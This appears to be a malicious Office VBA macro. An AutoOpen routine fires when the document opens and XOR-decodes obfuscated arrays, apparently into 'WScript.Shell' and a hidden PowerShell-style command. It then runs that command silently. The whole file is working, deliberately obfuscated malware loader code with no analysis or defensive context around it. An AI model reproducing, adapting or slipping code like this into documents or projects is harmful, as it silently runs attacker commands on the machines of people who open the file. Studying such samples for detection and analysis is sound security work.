Private Function DSnfdxIPwNZr(KShEEZCZjsZkprU As Variant, gBRvvdRQxLTMK As Variant)
Dim cPrhfMRLNXpsb As String
cPrhfMRLNXpsb = ""
For i = LBound(KShEEZCZjsZkprU) To UBound(KShEEZCZjsZkprU)
cPrhfMRLNXpsb = cPrhfMRLNXpsb & Chr(gBRvvdRQxLTMK(i) Xor KShEEZCZjsZkprU(i))
Next
DSnfdxIPwNZr = cPrhfMRLNXpsb
End Function
Sub AutoOpen()
Call aqYETARfVdCE
End Sub
Sub aqYETARfVdCE()




Set KQavEtPpFAcUKII = CreateObject(DSnfdxIPwNZr(Array(((165 - 27) + 28),((29 - 4) + (232 - 86)),237,108,((0 - 0) XOR (30 + 2)),(12 + (256 - 108)),(39 - 16),(73 XOR 49),85,(148 - 27),(85 XOR 35),(90 - 12),((41 - 2) XOR (10 + 14))),Array((99 + (180 - 38)),(169 XOR (159 - 78)),((31 - 9) + (198 - 78)),(45 - 15),(72 + 1),208,(37 + 62),(17 XOR ((22 - 1) + 50)),(11 - 5),17,(6 XOR (35 - 14)),(0 + 34),(92 - 9))))
KQavEtPpFAcUKII.Run DSnfdxIPwNZr(Array((27 XOR 112),(199 XOR ((7 - 3) + 36)),230,(16 XOR (1 + (88 - 44))),227,61,135,(75 - 27),((265 - 102) XOR ((10 - 2) + 9)),(((2 - 0) + (14 - 5)) XOR ((80 - 10) + 35)),101,(21 - 8),224,(94 XOR ((71 - 34) + 22)),(21 XOR 194)),Array((4 + 23),(50 XOR 178),(71 XOR (394 - 180)),((98 - 41) XOR (164 - 67)),(136 XOR 25),78,(((12 - 4) + 21) XOR (35 + 207)),(91 - 6),(195 XOR 29),(2 XOR (22 - 10)),(57 + (30 - 12)),(131 - 27),(218 - 66),(0 + 0),247)) & _
DSnfdxIPwNZr(Array(156,(54 XOR 185),68,(60 + 96),(73 + 27),94,(35 + 198),(245 - 69),192,(29 + 83),16,0,219,(56 - 5),(144 XOR (8 + (80 - 39)))),Array(245,(40 XOR (137 + (122 - 51))),((6 - 0) + (71 - 23)),((291 - 144) + 41),85,(51 XOR (113 - 29)),219,(304 - 146),241,((22 + (22 - 10)) XOR 100),(38 XOR 14),(1 + (54 - 9)),((43 - 16) XOR 241),(11 XOR (0 - 0)),151)) & _
DSnfdxIPwNZr(Array((211 + 30),(167 - 58),204,((200 - 47) XOR (60 + 2)),183,115,((9 + (11 - 1)) XOR 78),(96 - 47),(21 + 198),192,27,((36 - 2) XOR 121),(381 - 156),(45 XOR ((223 - 110) + 4)),(85 - 29)),Array(((98 + 94) XOR 31),(108 - 16),((81 + 96) XOR (93 - 15)),150,(((58 - 27) + 32) XOR (79 + 88)),1,(104 - 48),(49 XOR ((17 - 5) + (158 - 52))),((116 - 27) XOR (316 - 144)),176,((103 - 42) + 43),106,((221 - 98) + 70),(21 + 15),((0 + 0) XOR 24))) & _
DSnfdxIPwNZr(Array(66,(58 - 20),149),Array(43,((1 - 0) XOR (132 - 66)),237)),(0 - 0)
End Sub
